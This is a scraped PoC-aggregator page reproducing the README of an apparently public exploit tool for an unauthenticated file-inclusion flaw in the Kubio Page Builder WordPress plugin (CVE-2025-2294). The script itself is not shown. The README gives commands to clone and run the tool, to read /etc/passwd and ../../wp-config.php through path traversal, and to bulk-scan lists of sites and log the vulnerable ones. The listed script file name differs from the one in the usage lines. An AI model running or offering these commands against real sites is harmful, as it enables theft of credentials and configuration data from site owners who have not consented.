来源

关联漏洞

介绍

# Kubio Page Builder LFI Exploit (CVE-2025-2294)

![Python](https://img.shields.io/badge/python-3.6%2B-blue)
![License](https://img.shields.io/badge/license-MIT-green)
![Vulnerability](https://img.shields.io/badge/CVE-2025--2294-critical)

Local File Inclusion (LFI) exploit for Kubio Page Builder WordPress plugin (versions ≤ 2.5.1).

## 📌 Description

This tool exploits an unauthenticated LFI vulnerability in Kubio Page Builder plugin (CVE-2025-2294), allowing attackers to read sensitive files on vulnerable WordPress installations.

## 🚀 Features

- Single target mode (`-u`)
- Bulk scanning from file (`-l`)
- Version detection
- Output results to file (`-o`)
- Automatic vulnerable version check
- Custom file path support

## 📦 Installation

```bash
git clone https://github.com/mrrivaldo/CVE-2025-2294.git
```

## 🛠 Usage

### Basic Single Target
```bash
python3 cve-2025-2294.py -u https://vulnerable-site.com
```

### Custom File Path
```bash
python3 cve-2025-2294.py -u https://vulnerable-site.com -f ../../wp-config.php
```

### Bulk Scan Mode
```bash
python3 cve-2025-2294.py -l targets.txt -o results.txt
```

### Help Menu
```bash
python3 cve-2025-2294.py --help
```

## ⚙ Options
| Option | Description |
|--------|-------------|
| `-u`, `--url` | Single target URL |
| `-l`, `--list` | File containing list of targets |
| `-f`, `--file` | File to read (default: `/etc/passwd`) |
| `-o`, `--output` | Save vulnerable targets to file |

## 📝 Example File Structure
`targets.txt`:
```
https://wordpress-site1.com
http://wordpress-site2.com
https://another-vulnerable-site.com
```

## ⚠ Legal Disclaimer
This tool is for **educational purposes only**. The developer is not responsible for any misuse. Always obtain proper authorization before testing any systems.

文件快照

 [4.0K]  /data/pocs/4826838083f8a5685c4eb54e84f55ff3b647f76f
├── [5.2K]  cve-2025-2994.py
└── [1.8K]  README.md

0 directories, 2 files

备注